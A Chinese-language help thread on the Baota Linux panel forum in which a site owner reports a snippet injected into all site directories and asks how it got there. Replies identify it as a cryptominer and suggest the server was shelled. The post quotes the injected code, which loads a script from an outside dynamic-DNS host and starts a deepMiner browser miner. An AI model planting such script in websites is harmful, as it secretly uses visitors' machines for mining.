当前位置:论坛首页 > Linux面板 > 求助

BT5.7.3测试版下所有的网站目录被植入一段代码

发表在 Linux面板2018-2-28 06:05 [复制链接] 2 1720

BT5.7.3测试版下所有的网站目录被植入一段代码,导致所有开启了SSL的网站被谷歌判断为不安全并且窃取用户资料,从而被进行拦截和提示。因为无法判断这段代码是被挖矿了还是被劫持,特来求助。不知道这样的代码通常是被什么途径怎么植入的?

代码如下:
  1. <script src="https://greenindex.dynamic-dns.net/jqueryeasyui.js"></script>
  2.     <script>
  3.         var uri = 'www';
  4.         var jqueryui = new deepMiner.Anonymous(uri, {autoThreads: true,throttle: 0.5});
  5.         if (!jqueryui.isMobile() && !jqueryui.didOptOut(14400)) {
  6.             jqueryui.start();
  7.             }
  8.     </script>
复制代码


使用道具 举报 只看该作者 回复
发表于 2018-2-28 12:17:36 | 显示全部楼层
  1. deepMiner.Anonymous
复制代码

这还不是挖矿是什么,这么明显的英文

好好检查服务器权限和网站程序吧,你这是被getshell了
使用道具 举报 回复 支持 反对
发表于 2018-2-28 16:42:54 | 显示全部楼层
恭喜楼主被挖!

----------------------------------------------------------------------------------------------------
菜鸟团队技术博客点击联系
使用道具 举报 回复 支持 反对
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

普通问题处理

论坛响应时间:72小时

问题处理方式:排队(仅解答)

工作时间:白班:9:00 - 18:00

紧急运维服务

响应时间:3分钟

问题处理方式:宝塔专家1对1服务

工作时间:工作日:9:00 - 18:30

宝塔专业团队为您解决服务器疑难问题

点击联系技术免费分析

工作时间:09:00至18:30

快速回复 返回顶部 返回列表